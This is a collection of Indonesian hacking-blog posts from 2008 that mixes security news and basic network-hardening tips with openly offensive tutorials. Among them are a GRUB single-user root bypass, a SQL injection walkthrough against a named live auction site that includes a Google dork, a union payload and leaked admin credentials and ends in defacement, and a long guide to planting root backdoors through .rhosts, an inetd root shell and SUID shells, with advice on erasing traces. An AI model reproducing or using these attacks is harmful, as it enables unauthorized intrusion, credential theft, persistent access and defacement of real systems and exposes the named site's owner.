Buku ini merupakan lanjutan dari buku pertama, yaitu HTTP ATTACK yang berisi kumpulan teknik yang sering digunakan oleh para attacker untuk melakukan penetrasi terhadap suatu situs. Buku ini menyebabkan para pemula yang belum berpengalaman sekalipun akan dapat dengan mudah mengerti bagaimana teknik yang digunakan oleh seorang attacker untuk melakukan penetrasi. Buku ini sangat bermanfaat bagi para script kiddies (sebutan untuk pemula) untuk mempelajari cara memanfaatkan google dan memanfaatkan website yang memiliki kelemahan.

Pembahasan dalam buku ini meliputi:

* Mencari Web Target Menggunakan Google
* Memanfaatkan Web Target dalam Pembuatan Proxy Http
* Membuat PsyBNC
* Membuat Eggdrop
* Membuat Bot Php
* Membuat Backdoor Telnet

2008-11-09T20:42:00.000-08:00

Gibraltar Firewall 2.6 merupakan Linux Firewall yang didistribusikan kepada kalangan luas, di mana system ini dibangun dengan dasar Debian. Versi terbaru dari Gibraltar 2.6 ini diluncurkan beberapa hari lalu oleh Rene Mayrhofer. Peluncuran produk versi terbaru ini telah menggunakan Linux kernel 2.4, namun untuk pengembangan versi Gibraltar berikutnya diharapkan telah menggunakan Kernel 2.6.

Berbeda dengan versi Gibraltar sebelumnya, edisi kali ini telah mengalami cukup banyak perubahan terutama disisi traffic shaping performance dimana rule/peraturan dari Ip Table telah diset ulang dan traffic class telah mengalami pendefinisian ulang serta versi ini memperbolehkan kita untuk melakukan instalasi plugin dari SSL Explore

Terdapat pula dukungan beberapa layanan dalam versi terbaru ini antara lain Snort versi 2.7.0, NIPS (Network Instrusion Prevention System) dan NIDS (Network Instrusion Detection System). Gibraltar versi terbaru ini mendapat dukungan integrasi secara penuh dari Puresight Enterprice Edition for User-Based Authorization and Reporting. Terdapat pula interface berupa web di mana layanan tersebut diciptakan untuk melakukan konfigurasi Snort sebagai IDS. Terdapat pula penambahan paket spamassassin module for language classification dan paket tersebut dapat dikonfigurasikan melalui interface web.

Saat kita memulai untuk menggunakan Gibraltar 2.6 maka, terdapat layanan WLAN access point secara penuh yang mana fungsionalitas ini telah ditambahkan didalam versi terbaru ini,sehingga pada edisi ke-4 dari peluncurannya maka diharapkan produk terbaru Gibraltar ini telah mendukung secara penuh dari layanan 802.1x. Saat ini Gibraltar telah mendukung Atheros-based card dimana layanan tersebut dapat dikonfigurasikan melalui interface web. Selain itu, madwifi-tool telah terinstal didalamnya dan module kernel dari versi 2.6 ini telah diupdate/diperbaharui dengan vesi 0.9.4

Terdapat pula penambahan berupa tool untuk melakukan scanning terhadap virus untuk HTTP, FTP dan Protokol POP3, dan tool tersebut dapat bekerja sekalipun tanpa menggunakan harddisk. Hal ini dapat terjadi karena telah dilakukan beberapa modifikasi pada bagian config file dan pengembangan dalam melakukan management pada bagian temporary /var pada storage area. Gibraltar Firewall diciptakan untuk memverifikasi dan melindungin traffic pada jaringan, di mana produk ini juga melindungi jaringan internal dari serangan penyusup atau hacker.

Sekilas mengenai Gibraltar :
Dr. Rene Mayrhofer membangun aplikasi Gibraltar pada tahun 1999 sebagai salah satu project pengembangan yang bersifat Open Source. Sejak tahun 2003, Gibraltar dikembangkan oleh eSYS Information System GmbH dan juga Dr. Mayrhofer di Austria.

6 Langkah Pengamanan Dasar Jaringan :

2008-11-09T20:35:00.000-08:00

1. Ubahlah Sistem ID (Identitas)
Biasanya suatu layanan nirkabel dilengkapi dengan suatu standart pengamanan identitas atau yang sering disebut SSID (Service Set Identifier) or ESSID (Extended Service Set Identifier). Sangat mudah bagi seorang hacker untuk mencari tahu identitas default dari suatu layanan atau jaringan, jadi sebaiknya Anda segera mengubahnya menjadi suatu identitas yang unik, yang tidak mudah ditebak orang lain.

2. Mematikan identitas pemancar
Dengan mengumumkan kepada umum bahwa Anda memiliki suatu jaringan nirkabel akan membuat para hacker penasaran untuk membobol jaringan nirkabel Anda. Mempunyai suatu jaringan nirkabel bukan berarti harus memberitahukannya kepada semua orang. Periksalah secara manual perangkat keras yang Anda pakai untuk jaringan nirkabel tersebut, dan pelajarilah bagaimana cara mematikannya.

3. Sediakanlah enkripsi
WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access) dapat meng-enkripsi data Anda sehingga hanya penerima saja yang diharapkan dapat membaca data tersebut. WEP (Wired Equivalent Privacy) mempunyai banyak kelemahan yang membuatnya mudah disusupi. Kunci 128-bit hanya mempunyai tingkat pencapaian yang relatif rendah tanpa peningkatan keamanan yang signifikan, sedangkan untuk 40-bit atau 64-bit pada beberapa perlengkapan lainnya, mempunyai enkripsi yang sama baiknya. Dengan cara pengamanan yang standart saja pastilah tetap akan mudah bagi hacker untuk menyusup, namun dengan cara enkripsi ini pastilah akan membuat jaringan Anda lebih aman dari hacker. Jika memungkinkan, ada baiknya untuk menggunakan enkripsi WPA (peralatan yang lebih tua dapat diupgrade terlebih dahulu agar compatible dengan WPA). WPA dapat sangat menjanjikan dalam menjamin keamanan jaringan nirkabel Anda, namun masih tetap dapat dikalahkan oleh serangan DOS (denial of services).

4. Membatasi dari penggunaan traffic yang tidak perlu
Banyak router jaringan kabel maupun nirkabel yang dilengkapi firewalls. Bukan bermaksud mengedepankan firewalls, namun firewalls telah membantu dalam pertahanan keamanan jaringan. Bacalah petunjuk manual dari perangkat keras Anda dan pelajarilah cara pengaturan konfigurasi router Anda, sehingga hanya traffic yang sudah seijin Anda saja yang dapat dijalankan.

5. Ubahlah 'kata sandi' default Administrator milik Anda
Hal ini baik untuk semua penggunaan perangkat keras maupun perangkat lunak. Kata sandi default sangat mudah disalahgunakan, terutama oleh para hacker. Oleh karena itu sebaiknya ubahlah kata sandi Anda, hindari penggunaan kata dari hal-hal pribadi Anda yang mudah diketahui orang, seperti nama belakang, tanggal lahir, dan sebagainya.

6. Kunci dan lindungilah komputer Anda
Hal ini merupakan cara pengamanan terakhir untuk komputer Anda. Gunakanlah firewall, perangkat lunak Anti Virus, Zone Alarm, dan lain sebagainya. Setidaknya setiap satu minggu perbaharuilah Anti Virus yang Anda pakai.
(dna)

Tipe Serangan Hacker Terbaru

2008-11-09T20:31:00.000-08:00

Menurut hasil konferensi hacker Last Hope, menyatakan, dengan menggunakan laptop, headset ponsel, kartu kredit, atau bahkan paspor, dapat membuat user menjadi target pencurian data dan criminal lainnya. Dalam ketakutan namun sesi yang menyenangkan, yang berjudul "How do I Pwn Thee? Let me Count the Ways" (pwn di sini berbicara mengenai kepunyaan atau control), seorang hacker yang memiliki alias “RenderMan” menjelaskan bagaimana user berada dalam resiko keamanan dan mereka tidak mengetahuinya.

Serangan hacker menurut sebagian besar orang mungkin telah mengetahui bahwa mereka harus berhati-hati menggunakan jaringan Wi-Fi, khususnya public hotspot yang tidak mengenkripsi data yang ditransmisikan dan access point jaringan dapat disalahgunakan oleh orang lain. Akibatnya user dapat kehilangan data-data, menerima halaman web yang menipu, dan informasi lainnya, yang menyebabkan computer mereka telah diambil alih.

Ketika penumpang pesawat telah mengabaikan peringatan pramugrari untuk men-disable Wi-Fi atau mereka yang tidak mengetahui bagaimana cara mematikannya, akan mudah terkena penyerangan pihak lain di pesawat. RenderMan menyarankan user agar men-disable Wi-Fi ketika tidak digunakan dan menggunakan VPN, juga software firewall. Headset Bluetooth user juga dapat beresiko terhadap keamanan karena celah keamanan dalam teknologi tersebut dan default PIN yang tidak berubah. Dengan mengeksploitasi kelemahan teknologi tertentu, seseorang dapat masuk dan mencuri data, lalu menyusup dalam conversation, atau bahkan memata-matai user dengan memasukkan bug ke dalamnya. RenderMan menyarankan user untuk mengubah password, men-disable Bluetooth pada telepon, mematikan headset bila tidak digunakan, dan membatasi akses ke data dan fitur ketika berkomunikasi dengan alat Bluetooth lainnya.

Banyak orang tidak menyadari bahwa paspor U.S yang baru mempunyai teknologi RFID (Radio-Frequency Identification) dengan enkripsi yang lemah, yang membuat data pada chip mudah dibaca dengan reader device tertentu. Untuk itu, pemerintah U.S telah memasang metal foil di bagian belakang dan depan paspor, namun foil tersebut masih kaku dan masih lebar sehingga RFID reader masih dapat membacanya. (h_n)

Diskusikan berita ini di Diskusi BeritaNET.com

Awas Bug Lagi di YM

2008-11-09T20:22:00.000-08:00

Setelah minggu lalu ada bug di YM untuk modul webcam-nya, kali ini ditemukan lagi bug baru di modul ActiveX. Modul ini terembed dalam browser sehingga kalau ada situs jahat, situs tersebut bisa mengirimkan data yang menyebabkan komputer user bisa diambil alih ketika user mengunjungi web tersebut. Pengguna YM disarankan segera mengupdate ke versi terbaru (8.1.0.419). Jika Anda tidak menggunakan fitur YM seperti Video dan Voice Chat, Anda bisa menggunakan klien alternatif, misalnya Pidgin, yang secara umum lebih aman.

Sumber : CNet News

Trojan Storm Serang Blogger.com

2008-11-09T20:18:00.000-08:00

Ratusan situs yang dihosting oleh layanan Google Blogger.com diserang oleh trojan yang bernama storm. Trojan ini akan membuat posting baru ke account blogger yang berhasil dijebol yang menggunakan fasilitas mail-2-blogger. Ketika ada user yang mengunjungi situs ini, dan mengklik link yang diberikan oleh trojan, maka user bisa terinfeksi karena situs yang dituju akan mencoba aneka macam cara agar browser pengunjung secara otomatis mengeksekusi trojan. Jika tidak berhasil menginfeksi secara otomatis, maka situs akan memberikan trojan secara manual, dan berharap pengunjung akan menjalankan file program tersebut. Saat ini Google telah membersihkan situs-situs yang terkena worm ini, namun Anda sebaiknya tetap berhati-hati ketika browsing, apalagi sampai menjalankan program yang tidak Anda kenal.

Sumber: slashdot

Exploit Wordpress Dirilis

2008-11-09T20:14:00.000-08:00

Para blogger yang menggunakan Wordpress sebaiknya segera mengupdate versinya ke versi terbaru 2.2.3, karena skrip untuk mengeksploit aneka versi Wordpress telah dirilis. Exploit ini bisa didownload di http://milw0rm.com/exploits/4397 dan telah diuji untuk menyerang Wordpress versi 2.2, 2.2.2, 2.0.5, 2.0.6, dan 2.1. Wordpress merupakan aplikasi blogging yang populer saat ini karena mudah diinstall, namun sayangnya tidak menyediakan fitur autoupgrade.

Anda dapat menginstall plugin Wordpress Automatic Update untuk mempermudah update, namun Anda juga perlu rajin mengupdate plugin ini, karena versi sebelumnya juga memiliki bug yang berbahaya.

Sumber: BlogSecurity

Gunakan HTTPS untuk GMail

2008-11-09T20:13:00.000-08:00

Sebuah tool yang dapat digunakan untuk membajak sesi Gmail akan segera dirilis. Ketika Anda login ke Gmail, username dan password memang selalu dikirimkan dalam bentuk terenkripsi, namun demikian, setelah Anda login, Anda hanya akan diidentifikasi menggunakan cookie yang dikirim tanpa dienkripsi. Jika seseorang mendapatkan cookie ini, maka orang tersebut akan bisa mengakses account Gmail Anda, tanpa perlu tahu password Anda. Serangan semacam ini disebut sidejacking. Pencurian cookie ini bisa dilakukan jika Anda menggunakan hotspot yang sifatnya publik, di warung Internet atau jaringan manapun yang kurang aman.

Untungnya GMail telah menyediakan opsi untuk melakukan koneksi via HTTPS agar cookie Anda selalu dienkripsi (Akhiran S artinya secure). Sayangnya opsi ini tidak aktif secara default. Anda Perlu pergi ke settings, scroll ke bawah pilih "Always Use HTTPS" dan pilih "Save Changes". Meski belum dibuktikan, pengguna layanan email lain (Hotmail, Yahoo, dll) juga sebenarnya berpotensi diserang dengan cara serupa namun saat ini tools yang mudah untuk menyerang layanan mail selain GMail belum tersedia secara umum (tools yang agak kompleks seperti Hamster dan Ferret sudah tersedia untuk menyerang situs manapun). Jika tools serupa dirilis untuk Yahoo dan Microsoft, hal itu akan sangat menyulitkan pengguna karena layanan-layanan tersebut, seperti kebanyakan layanan email gratis lain, tidak menyediakan protokol HTTPS.

Jadi root di linux tanpa password.

2008-10-20T21:53:00.003-07:00

Boot Linux tanpa Password
Melalui mode single pada GRUB
=====================================================
Hi, ketemu lagi dengan saya, sikeren Al-k. ;)
Sama seperti sebelum sebelumnya, yaitu artikel mengenai jebol password,
tapi kali ini saya akan menjelaskannya pada Linux.
Mungkin pada artikel yang lain telah di jelaskan bagaimana
cara melakukan login tanpa password dengan bootloader Lilo,
tapi kali ini saya akan menjelaskannya pada bootloader Grub.

Beginilah caranya ...
=====================================

1.) Defaultnya, pas di bootloader grub ada 2 pilihan yaitu Redhat Linux dan DOS.
Pilih, yang Redhat Linux, terus tekan e di keyboard.
Tombol e berguna untuk melakukan edit.

2.) http://h1.ripway.com/alk/grub.png
setelah itu, pilih bagian ke 2 atau 3, disitu tertulis kernel blablablablaba ...
tekan e dikeyboard

3.) Kemudian tambahkan s atau single dibelakangnya, kira kira seperti ini

kernel /boot/vmlinuz-2.6.15-1-686 root=/dev/sda1 ro single

setelah itu Escape.

4.) Masih dalam keadaan memilih kernel, kemudian tekan b di keyboard untuk Boot. anda akan di bawa
pada kedudukan root. Silahkan ketik passwd untuk mengganti password yang baru atau anda bisa
mengedit file /etc/shadow, untuk menghilangkan password pada root.

Jreng jreng jreng ... satu lagi, anda login sebagai administrator tanpa password

SQL Injection AJ Auction seluruh versi

2008-10-20T21:52:00.003-07:00

SQL Injection pada Aj Auction untuk seluruh versi.
=======================================================

Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk
sebagai admin pada situs yang memiliki bug pada halaman subcat.php

langsung aja buka google-nya ...
masukkan keyword ini inurl:/subcat.php?cate_id=

nah loh, dapet banyak bangett ...
pilih aja salah satunya contoh :

http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096

setelah cate_id= di hapus aja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas

sword),2%20from%20admin/*&view=list

kira kira jadi begini

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11

7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

nah loh passwordnya langsung dapet

turkey:adminturkeypass:daniel87

itu artinya
usernamenya admin
passwordnya daniel87

sekarang masuk ke control panelnya

http://www.estoop.it/admin
terus masukkin username dan passwordnya

jreng jreng jreng anda di bawa ke control panel ...

hehehehe ... deface deface ...

Melihat Log website........!!!

2008-10-20T21:45:00.000-07:00

Jika kita memiliki suatu website tentunya kita pasti ingin
tahu jejak dari pengunjung website kita.

Beberapa kegunaan dari system log diantaranya:
selain untuk mengetahui informasi visitor, log file juga
berguna untuk membantu analisis security

Oke saya akan langsung ke penjelasannya,
kali ini saya akan menjelaskan log file dengan system
script PHP:

Script System LOG dengan FLAT FILE:
/* ini utk melihat type browser
$agent = $_SERVER['HTTP_USER_AGENT'];

/* ini utk melihat script di eksekusi dari mana GET(URL)
$uri = $_SERVER['REQUEST_URI'];

/* ini utk melihat IP Pengunjung
$ip = $_SERVER['REMOTE_ADDR'];

/* ini utk melihat script di refer dari mana
$ref = $_SERVER['HTTP_REFERER'];

/* ini utk melihat Proxy pengunjung
$asli = $_SERVER['HTTP_X_FORWARDED_FOR'];

/* ini utk melihat koneksi pengunjung
$via = $_SERVER['HTTP_VIA'];

/* ini variabel tanggal
$dtime = date('r');

/* perhatian jika pengunjung pakai Proxy transparent
/* maka $_SERVER['HTTP_X_FORWARDED_FOR'] akan menampilkan IP Asli pengunjung
/* sebaliknya $_SERVER['REMOTE_ADDR'] akan menampilkan Proxy
/* Untuk Lebih jelas nya tentang macam2 Proxy saya akan jelaskan di tutorial yang lain

/* ini adalah deskripsi variabel entry_line:
$entry_line = "Waktu: $dtime | IP asli: $ip | Browser: $agent | URL: $uri | Referrer: $ref | Proxy: $asli | Koneksi: $via
"; /* <-- perhatian!! ini harus new line alias kamu enter sekali supaya hasilnya jadi new line

/* "fopen()" utk fungsi membuka file, "a" ini yg paling penting.!!,
/* ini berfungsi jika file "jejak.txt" tidak ada dalam server maka PHP akan menciptakannya
$fp = fopen("jejak.txt", "a");

/* "fputs()" fungsinya utk menulis log dlm file
fputs($fp, $entry_line);

/* "fclose()" fungsinya untuk menutup file
fclose($fp);

?>

Fungsi php System LOG dengan FLAT FILE ini, menurutku lumayan berguna
daripada ribet pakai koneksi MySql

liat lagi....!!

2008-10-20T21:39:00.003-07:00

wddt, kk", saya mau share dikit cara buat lihat ip address dan serba serbi nya
1. ke command (start,run,ketik cmd) --> win xp, kalau 98 (ketik command)
2. ketik ipconfig (kelihatan IP na de)
3. nbtstat -a --> untuk melihat nama pemakai ip
contoh : nbtstat -a 192.168.0.2
4. netstat 10 --> untuk melihat daftar jaringan nya (ke mana aja connect nya)
5. net view / net user -> untuk melihat user di jaringan kita
6. Shutdown -i -> untuk menshutdown pc orang lain
sekian dulu kk, thx

cara melihat IP...!!

2008-10-20T21:37:00.000-07:00

Cara untuk melihat IP address
Post by skydcloud on Apr 29, 2007, 7:15pm

Artikel ini ditujukan untuk memandu mereka yang masih bingung dengan terminologi sekuritas jaringan komputer seperti exploit,
trojan, dll dan ingin mengetahui konsep-konsep dasarnya.

EXPLOITS
Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan shell UNIX baru yang baru kamu 'dapatkan'.
Dan mungkin sekarang kamu sudah mulai bertanya-tanya, "apa sih eksploit (exploit, 'sploits) itu?". Dalam konteks per-hacking-an,
eksploit tidaklah jauh berbeda dengan artinya dalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit 'hacking' lebih
spesifik lagi, yang kurang lebih bisa diartikan sebagai 'pemanfaatan kelemahan dari sebuah sistem untuk tujuan-tujuan yang diluar
dari penggunaan normal.' Kelemahan-kelemahan ini bisa berupa kesalahan pemrograman, sesuatu yang tidak direncanakan oleh
pemrogram asli, dan lain-lain. Umumnya, yang jelas paling menarik perhatian kita, adalah eksploit yang akan memberikan kita akses
tidak terbatas ke seluruh aspek dari sebuah sistem. Dalam UNIX, sering kita dengar istilah 'mengeksploit program anu untuk mendapat
privilese root'. Tentu saja mendapatkan 'root' bukanlah satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin anda sudah
alami sendiri, kadang sebuah cacat dalam program seperti maild atau ftpd bisa dimanfaatkan untuk tujuan 'header forging',
'ip spoofing', 'denial of service attack', dan 'mail bombing'.

Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan eksploit remote. Eksploit lokal adalah jenis eksploit yang
hanya bisa dijalankan jika kamu sudah punya akses ke dalam suatu sistem (baik itu melalui login telnet, ftp, dll). Eksploit jenis ini
jumlahnya banyak, sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk di-eksploit. Contoh - contoh dari
eksploit jenis ini adalah buffer overflow (i.e. mh di RedHat 5, SuperProbe, dll), race conditions (dimana dua proses saling berlomba
untuk menyelesaikan tugas masing-masing, biasanya proses A disuruh untuk menjalankan suatu utilitas yang membutuhkan privilese
root temporer sementara proses B dirancang untuk mencegat proses A sebelum proses A kembali statusnya ke privilese user biasa,
mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi di mesin-mesin IRIX dan SunOS.) Bagaimana caranya agar saya
bisa mendapatkan eksploit seperti ini? Tentu saja kamu bisa menghabiskan waktu berjam-jam untuk mengutak-utik sebuah program
sampai berhasil kamu jebol (lebih baik dilakukan di kotak kamu sendiri), seperti para 'elite' lainnya. Biasanya eksploit diprogram
dengan C, perl, atau sh. Namun kalau ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas), banyak eksploit yang sudah didokumentasi.

Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa mengeksploit sistem tanpa mengetahui otorisasi user/password. Tentu saja eksploit-eksploit jenis ini jauh lebih sedikit jumlahnya, dan terkadang dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file /etc/passwd (dulu LithErr pernah memberi resep cepat memanfaatkan phf). Mungkin belum terlihat fatal, namun sekalinya sang 'cracker' berhasil masuk ke dalam sistem memanfaatkan login dan password dari salah seorang user, maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan akses tak terbatas milik root. Eksploit port 143 (IMAPd) malahan lebih gila lagi, dengan memberikan akses root tanpa password. Apa trik dan tip yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas sebuah portscanner sangatlah bermanfaat untuk melihat port-port mana saja yang menerima koneksi. Beberapa jenis 'scanner' lebih terfokus lagi, seperti cgi scanner dari kecoak (roachscan) yang saat dijalankan akan memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file password atau jalan masuk lainnya, melalui beberapa jenis eksploit umum. Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat dari http://www.l0pht.com/. Untuk menghemat waktu, banyak cracker yang menulis skrip otomasi, jalankan skrip, tinggal berikan daftar target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam atau dua jam kemudian, tinggal diperiksa server-server mana saja yang ada lobangnya, bisa dieksploit atau tidak, dll (coba lihat artikel-artikel mengenai scanning/probing di situs-situs hacker).

Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti eksploit lynx mailer, yang walaupun kodenya sendiri terletak di host lain, namun untuk digunakan masih perlu campur tangan dari user lokal untuk bisa bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan file password ke alamat email tertentu.)

BACKDOOR
Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya,
dalam artikel ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem.

Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di
keesokan harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih
jalan masuk 'alternatif'. Jelas, sebagian besar teknik-teknik backdooring hanya bisa diterapkan
jika kamu mempunyai perizinan root. Ingat, bahwa tujuan membuat backdoor bukanlah untuk
mendapatkan akses root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin
menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap selama file-file
/etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak.
Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin,
sebab tanpa sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan
privilese root.

Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-router, printserver, dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah dengan melalui file /.rhosts:

korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts

perintah diatas akan menambah satu entri di file .rhosts (sistem luar -dalam contoh diatas user ganjaman dari indohack2.ri.go.id - yang boleh mengakses account tanpa password), dan untuk masuk kembali ke sistem dari account "ganjaman" di indohack2.ri.go.id :

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

poof! shell root tanpa password!
Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari
file /etc/passwd sebuah sistem:

bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false

tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi.
Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak diantara crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet dengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya adalah file pertama yang akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di home directory milik bin. Kembali ke entri file password diatas, bisa kita lihat bahwa walaupun
kita bisa me- rlogin -l bin korban.lameisp.net.id, namun kita masih juga tidak bisa mendapatkan
shell sebab account 'bin' dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masala
h ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau /bin/tcsh. Apa daya seorang s
ysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan
merupakan nama file.

Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi metode ini benar-benar cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat salah satu port yang didefinisikan dalam "inetd":

root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >> /etc/services root@korban
# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >> /etc/inetd.conf root@korban# echo
"echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r

menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat,
namun tidak akan segera tampak. Penjelasan dari ketiga perintah diatas:
1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic Control Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya sysadmin tidak akan begitu curiga dengan nama seperti itu.

2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese root lewat cara ini hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan perintah-perintah selayaknya kita login lewat jalur normal. Sang shell akan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita. Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu lebih pintar dan memilih nama yang tidak begitu mencurigakan seperti /tmp/dev001).

3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan(id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untukmenghemat tempat, kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari mesin host kita ke file .rhosts milik root. Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik root dan isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas akan memberikan jalan masuk lewat belakang ke dalam sistem target (idih, kesannya kayak cerita-cerita porno anal seks aja!). Sekarang kamu tinggal:

ganjaman@indohack2> telnet korban.lameisp.net.id 6969

nah, sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di mesin korban akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali menggarap system target (sebaiknya dilakukan saat itu juga, sebab sang sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port 6969) kamu tinggal:

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

dan, BOOM!

korban#

shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke indohack@hotmail.com, bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent...engin badannya ..." :) ). Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu kamu emang udah cukup tinggi, teknik menyembunyikan diri dan anti deteksi udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, serangan bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan service-service yang jarang (hampir tidak pernah dipakai) seperti utilitas-utilitas X, segala utilitas berkepala "r", dan banyak lagi.

Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan yang akan mensensus seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program yang sudah berjalan / terinstal secara default, seperti xterm dan splitvt, sehingga sebuah option rootshell akan secara otomatis execv("/bin/sh", "sh", NULL);.

Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikel kelas kacangan ini), kamu bisa modifikasi daemon-daemon yang sedang berjalan untuk menerima perintah-perintah hasil karangan kamu sendiri. Berikut adalah cuplikan dari metode milik Hacker FBI telah berhasil memodifikasi program
sendmail di server korban.com (tembakan pestol efbiay!):

212@GG> telnet korban.com
25 Trying mesin.korban.com
Connected to mesin.korban.com
Escape character is '^]'.
220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5
[snip]
PSM_EXEC /bin/cp /bin/sh /tmp/elit
Done ... master! PSM_EXEC /bin/chmod 4755 /tmp/elit
Done ... master!
Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan segala kerendahan hati
minta izin untuk berguru!

TROJAN HORSE
